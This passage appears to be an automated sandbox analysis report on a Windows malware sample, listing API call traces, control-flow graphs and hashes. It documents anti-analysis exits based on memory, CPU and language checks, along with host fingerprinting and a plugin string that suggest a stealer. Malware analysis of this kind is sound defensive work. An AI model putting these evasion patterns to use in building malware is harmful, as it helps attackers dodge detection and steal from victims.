                            • GetProcAddress.KERNEL32(75900000,013F1628), ref: 001466D4
                            • GetProcAddress.KERNEL32(75900000,013F1550), ref: 001466ED
                            • GetProcAddress.KERNEL32(75900000,013E65A8), ref: 00146705
                            • GetProcAddress.KERNEL32(75900000,013F1568), ref: 0014671D
                            • GetProcAddress.KERNEL32(75900000,013F1658), ref: 00146736
                            • GetProcAddress.KERNEL32(75900000,013E6508), ref: 0014674E
                            • GetProcAddress.KERNEL32(75900000,013F1670), ref: 00146766
                            • GetProcAddress.KERNEL32(75900000,013F1718), ref: 0014677F
                            • GetProcAddress.KERNEL32(75900000,013E65E8), ref: 00146797
                            • GetProcAddress.KERNEL32(75900000,013F1760), ref: 001467AF
                            • GetProcAddress.KERNEL32(75900000,013E63A8), ref: 001467C8
                            • LoadLibraryA.KERNEL32(013F17C0,?,?,?,00141DD3), ref: 001467D9
                            • LoadLibraryA.KERNEL32(013F1730,?,?,?,00141DD3), ref: 001467EB
                            • LoadLibraryA.KERNEL32(013F1778,?,?,?,00141DD3), ref: 001467FD
                            • LoadLibraryA.KERNEL32(013F17D8,?,?,?,00141DD3), ref: 0014680E
                            • LoadLibraryA.KERNEL32(013F1748,?,?,?,00141DD3), ref: 00146820
                            • GetProcAddress.KERNEL32(75070000,013F1790), ref: 0014683D
                            • GetProcAddress.KERNEL32(75FD0000,013F17A8), ref: 00146859
                            • GetProcAddress.KERNEL32(75FD0000,013F95E0), ref: 00146871
                            • GetProcAddress.KERNEL32(75A50000,013F9628), ref: 0014688D
                            • GetProcAddress.KERNEL32(74E50000,013E65C8), ref: 001468A9
                            • GetProcAddress.KERNEL32(76E80000,013F9248), ref: 001468C5
                            • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 001468DC
                            Strings
                            • NtQueryInformationProcess, xrefs: 001468D1
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: c1508b6a8c81494cea16b71ca03f1a4b6cdad7b93dec04a6c91c7df78e58a6c3
                            • Instruction ID: 4f08a196f0c44c21360dd5a0f2dad2d41f6952898fac71952f9b9073ff9a76a3
                            • Opcode Fuzzy Hash: c1508b6a8c81494cea16b71ca03f1a4b6cdad7b93dec04a6c91c7df78e58a6c3
                            • Instruction Fuzzy Hash: FFA12BB5A11340DFD756DF64ED89B263BBDF788742B00891AE916933B4DB34A900DB60
                            Function 00141DC0 Relevance: 45.2, APIs: 30, Instructions: 220stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2141 141dc0-141ddb call 122a90 call 1465a0 2146 141ddd 2141->2146 2147 141dea-141df7 call 122930 2141->2147 2148 141de0-141de8 2146->2148 2151 141e05-141e33 2147->2151 2152 141df9-141dff lstrcpy 2147->2152 2148->2147 2148->2148 2156 141e35-141e37 ExitProcess 2151->2156 2157 141e3d-141e4b GetSystemInfo 2151->2157 2152->2151 2158 141e55-141e70 call 121030 call 1210c0 GetUserDefaultLangID 2157->2158 2159 141e4d-141e4f ExitProcess 2157->2159 2164 141e72-141e79 2158->2164 2165 141e88-141e9a call 142ca0 call 143fe0 2158->2165 2164->2165 2167 141e80-141e82 ExitProcess 2164->2167 2171 141eb7-141ed6 lstrlen call 122930 2165->2171 2172 141e9c-141eae call 142c10 call 143fe0 2165->2172 2178 141ef3-141f10 lstrlen call 122930 2171->2178 2179 141ed8-141edd 2171->2179 2172->2171 2185 141eb0-141eb1 ExitProcess 2172->2185 2186 141f12-141f14 2178->2186 2187 141f2a-141f4b call 142ca0 lstrlen call 122930 2178->2187 2179->2178 2182 141edf-141ee1 2179->2182 2182->2178 2183 141ee3-141eed lstrcpy lstrcat 2182->2183 2183->2178 2186->2187 2188 141f16-141f24 lstrcpy lstrcat 2186->2188 2193 141f4d-141f4f 2187->2193 2194 141f6a-141f84 lstrlen call 122930 2187->2194 2188->2187 2193->2194 2195 141f51-141f55 2193->2195 2199 141f86-141f88 2194->2199 2200 141f9e-141fbb call 142c10 lstrlen call 122930 2194->2200 2195->2194 2198 141f57-141f64 lstrcpy lstrcat 2195->2198 2198->2194 2199->2200 2201 141f8a-141f98 lstrcpy lstrcat 2199->2201 2206 141fbd-141fbf 2200->2206 2207 141fda-141fdf 2200->2207 2201->2200 2206->2207 2208 141fc1-141fc5 2206->2208 2209 141fe6-141ff2 call 122930 2207->2209 2210 141fe1 call 122a20 2207->2210 2208->2207 2211 141fc7-141fd4 lstrcpy lstrcat 2208->2211 2215 141ff4-141ff6 2209->2215 2216 142000-142036 call 122a20 * 5 OpenEventA 2209->2216 2210->2209 2211->2207 2215->2216 2217 141ff8-141ffa lstrcpy 2215->2217 2228 14205c-142070 CreateEventA call 141cf0 call 1401a0 2216->2228 2229 142038-14205a CloseHandle Sleep OpenEventA 2216->2229 2217->2216 2233 142075-14207e CloseHandle ExitProcess 2228->2233 2229->2228 2229->2229
                            APIs
                              • Part of subcall function 001465A0: GetProcAddress.KERNEL32(75900000,013F1538), ref: 001465F9
                              • Part of subcall function 001465A0: GetProcAddress.KERNEL32(75900000,013F15B0), ref: 00146612
                              • Part of subcall function 001465A0: GetProcAddress.KERNEL32(75900000,013F15F8), ref: 0014662A
                              • Part of subcall function 001465A0: GetProcAddress.KERNEL32(75900000,013F15C8), ref: 00146642
                              • Part of subcall function 001465A0: GetProcAddress.KERNEL32(75900000,013F91A8), ref: 0014665B
                              • Part of subcall function 001465A0: GetProcAddress.KERNEL32(75900000,013E6588), ref: 00146673
                              • Part of subcall function 001465A0: GetProcAddress.KERNEL32(75900000,013E6428), ref: 0014668B
                              • Part of subcall function 001465A0: GetProcAddress.KERNEL32(75900000,013F1640), ref: 001466A4
                              • Part of subcall function 001465A0: GetProcAddress.KERNEL32(75900000,013F1610), ref: 001466BC
                              • Part of subcall function 001465A0: GetProcAddress.KERNEL32(75900000,013F1628), ref: 001466D4
                              • Part of subcall function 001465A0: GetProcAddress.KERNEL32(75900000,013F1550), ref: 001466ED
                              • Part of subcall function 001465A0: GetProcAddress.KERNEL32(75900000,013E65A8), ref: 00146705
                              • Part of subcall function 001465A0: GetProcAddress.KERNEL32(75900000,013F1568), ref: 0014671D
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00141DFF
                            • ExitProcess.KERNEL32 ref: 00141E37
                            • GetSystemInfo.KERNEL32(?), ref: 00141E41
                            • ExitProcess.KERNEL32 ref: 00141E4F
                              • Part of subcall function 00121030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00121046
                              • Part of subcall function 00121030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0012104D
                              • Part of subcall function 00121030: ExitProcess.KERNEL32 ref: 00121058
                              • Part of subcall function 001210C0: GlobalMemoryStatusEx.KERNEL32 ref: 001210EA
                              • Part of subcall function 001210C0: ExitProcess.KERNEL32 ref: 00121114
                            • GetUserDefaultLangID.KERNEL32 ref: 00141E5F
                            • ExitProcess.KERNEL32 ref: 00141E82
                            • ExitProcess.KERNEL32 ref: 00141EB1
                            • lstrlen.KERNEL32(013F9228), ref: 00141EBE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00141EE5
                            • lstrcat.KERNEL32(00000000,013F9228), ref: 00141EED
                            • lstrlen.KERNEL32(00154BA0), ref: 00141EF8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141F18
                            • lstrcat.KERNEL32(00000000,00154BA0), ref: 00141F24
                            • lstrlen.KERNEL32(00000000), ref: 00141F33
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141F59
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00141F64
                            • lstrlen.KERNEL32(00154BA0), ref: 00141F6F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141F8C
                            • lstrcat.KERNEL32(00000000,00154BA0), ref: 00141F98
                            • lstrlen.KERNEL32(00000000), ref: 00141FA7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141FC9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00141FD4
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                            • String ID:
                            • API String ID: 3366406952-0
                            • Opcode ID: d985c614e81962f3c9a3c5d8885e8fc113618a6ecd076fa1a9e07b81afc059da
                            • Instruction ID: 0b5792dc3c241b57a247c1a3083953d59baa36af915343f1332e7a0955b09079
                            • Opcode Fuzzy Hash: d985c614e81962f3c9a3c5d8885e8fc113618a6ecd076fa1a9e07b81afc059da
                            • Instruction Fuzzy Hash: 5C71AF31901326FBDB22ABB0EC89B6E7BBDAF15716F040415F906A71B1DF309946CB60
                            Function 00142910 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2782 142910-142953 GetWindowsDirectoryA 2783 142955 2782->2783 2784 14295c-1429ba GetVolumeInformationA 2782->2784 2783->2784 2785 1429bc-1429c2 2784->2785 2786 1429c4-1429d7 2785->2786 2787 1429d9-1429f0 GetProcessHeap RtlAllocateHeap 2785->2787 2786->2785 2788 1429f6-142a14 wsprintfA 2787->2788 2789 1429f2-1429f4 2787->2789 2790 142a2b-142a42 call 1473f0 2788->2790 2789->2790
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0014294B
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00139506,00000000,00000000,00000000,00000000), ref: 0014297C
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001429DF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 001429E6
                            • wsprintfA.USER32 ref: 00142A0B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                            • String ID: :\$C
                            • API String ID: 2572753744-3309953409
                            • Opcode ID: 7fc9539f4052a222af69133e6c91a0b39778f33f7c954e6ec6c6187742f3f538
                            • Instruction ID: 3efc9a6f4cf2927bfba20b00e8bc123bba626d7387d94cdaf37612814639c2c5
                            • Opcode Fuzzy Hash: 7fc9539f4052a222af69133e6c91a0b39778f33f7c954e6ec6c6187742f3f538
                            • Instruction Fuzzy Hash: 00318FB19082199FCB15DFB8D985AEFBFBCEF58301F50416AE515F7660E3348A408BA1
                            Function 00124A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2850 124a60-124afc RtlAllocateHeap 2867 124b7a-124bbe VirtualProtect 2850->2867 2868 124afe-124b03 2850->2868 2869 124b06-124b78 2868->2869 2869->2867
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00124AA2
                            • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00124BB0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                            • API String ID: 1542196881-3329630956
                            • Opcode ID: 0177b92a41f6bfb69e9c067b4f982d6aaa60fbea19a48d4d9cdab2304ec6def9
                            • Instruction ID: 4b53875824e8718cc1866417cfb9520fbb6faebd8819bf650699d5870b84b66a
                            • Opcode Fuzzy Hash: 0177b92a41f6bfb69e9c067b4f982d6aaa60fbea19a48d4d9cdab2304ec6def9
                            • Instruction Fuzzy Hash: 81310910B8022CF7C6326BB66C47BAF7E5DDF4C75EB000256FC385A1818BB054C889E1
                            Function 00142C10 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00142C3F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00142C46
                            • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00142C5A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: 5d9b16e4df7a59c70507b9d1c00b75bb3c27f553e1209ab1937583cf83080036
                            • Instruction ID: 3008a959a123f25dc4f81862fefef6f3c8889b04e2651d7232c5de22db906052
                            • Opcode Fuzzy Hash: 5d9b16e4df7a59c70507b9d1c00b75bb3c27f553e1209ab1937583cf83080036
                            • Instruction Fuzzy Hash: 8CF0B4B1A44304EBD700DF88DD49B9ABBBCFB08B22F000216F914E3290D774190486A1
                            Function 0013F390 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1156stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(0014CFF4), ref: 0013F3B5
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013F3D1
                            • lstrlen.KERNEL32(0014CFF4), ref: 0013F3DC
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013F3F5
                            • lstrlen.KERNEL32(0014CFF4), ref: 0013F400
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013F419
                            • lstrcpy.KERNEL32(00000000,00154FA4), ref: 0013F43E
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013F46C
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013F4A0
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013F4D0
                            • lstrlen.KERNEL32(013E6388), ref: 0013F4F5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: ERROR
                            • API String ID: 367037083-2861137601
                            • Opcode ID: 157c8488c1624756955cd600ef9c31b81d0d15edb233344fa75647f81993c45c
                            • Instruction ID: 823c2fa2bfa1b127e941d6eac376a6d8adfc7345c7e38f6273ef4bd790527b0f
                            • Opcode Fuzzy Hash: 157c8488c1624756955cd600ef9c31b81d0d15edb233344fa75647f81993c45c
                            • Instruction Fuzzy Hash: 55A25970D01726DFCB21DF69D949A5ABBF8AF44315F18817EE8099B261EB31DC42CB90
                            Function 001401A0 Relevance: 63.1, APIs: 40, Strings: 1, Instructions: 1571stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001401E3
                            • lstrlen.KERNEL32(0014CFF4), ref: 0014028D
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001402B1
                            • lstrlen.KERNEL32(0014CFF4), ref: 001402BC
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001402E0
                            • lstrlen.KERNEL32(0014CFF4), ref: 001402EB
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0014030F
                            • lstrlen.KERNEL32(0014CFF4), ref: 0014032A
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00140359
                            • lstrlen.KERNEL32(0014CFF4), ref: 00140364
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00140393
                            • lstrlen.KERNEL32(0014CFF4), ref: 0014039E
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001403D6
                            • lstrlen.KERNEL32(0014CFF4), ref: 00140420
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00140458
                            • lstrcpy.KERNEL32(00000000,?), ref: 0014076B
                            • lstrlen.KERNEL32(013E64C8), ref: 0014077B
                            • lstrcpy.KERNEL32(00000000,?), ref: 001407A7
                            • lstrcat.KERNEL32(00000000,?), ref: 001407B3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001407DE
                            • lstrlen.KERNEL32(013FE2E0), ref: 001407F5
                            • lstrcpy.KERNEL32(00000000,?), ref: 0014081C
                            • lstrcat.KERNEL32(00000000,?), ref: 00140828
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00140851
                            • lstrlen.KERNEL32(013E6668), ref: 00140868
                            • lstrcpy.KERNEL32(00000000,?), ref: 00140899
                            • lstrcat.KERNEL32(00000000,?), ref: 001408A5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001408D6
                            • lstrcpy.KERNEL32(00000000,013F90A8), ref: 0014091B
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 00121557
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 00121579
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 0012159B
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 001215FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 0014094F
                            • lstrcpy.KERNEL32(00000000,013FE5B0), ref: 001409B7
                            • lstrcpy.KERNEL32(00000000,013F9058), ref: 00140A28
                            • lstrcpy.KERNEL32(00000000,fplugins), ref: 00140A9F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00140AF8
                            • lstrcpy.KERNEL32(00000000,013F8FF8), ref: 00140BC8
                              • Part of subcall function 001224E0: lstrcpy.KERNEL32(00000000,?), ref: 00122528
                              • Part of subcall function 001224E0: lstrcpy.KERNEL32(00000000,?), ref: 0012254E
                              • Part of subcall function 001224E0: lstrcpy.KERNEL32(00000000,?), ref: 00122577
                            • lstrcpy.KERNEL32(00000000,013F8EF8), ref: 00140C9E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00140D51
                            • lstrcpy.KERNEL32(00000000,013F8EF8), ref: 00140F28
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
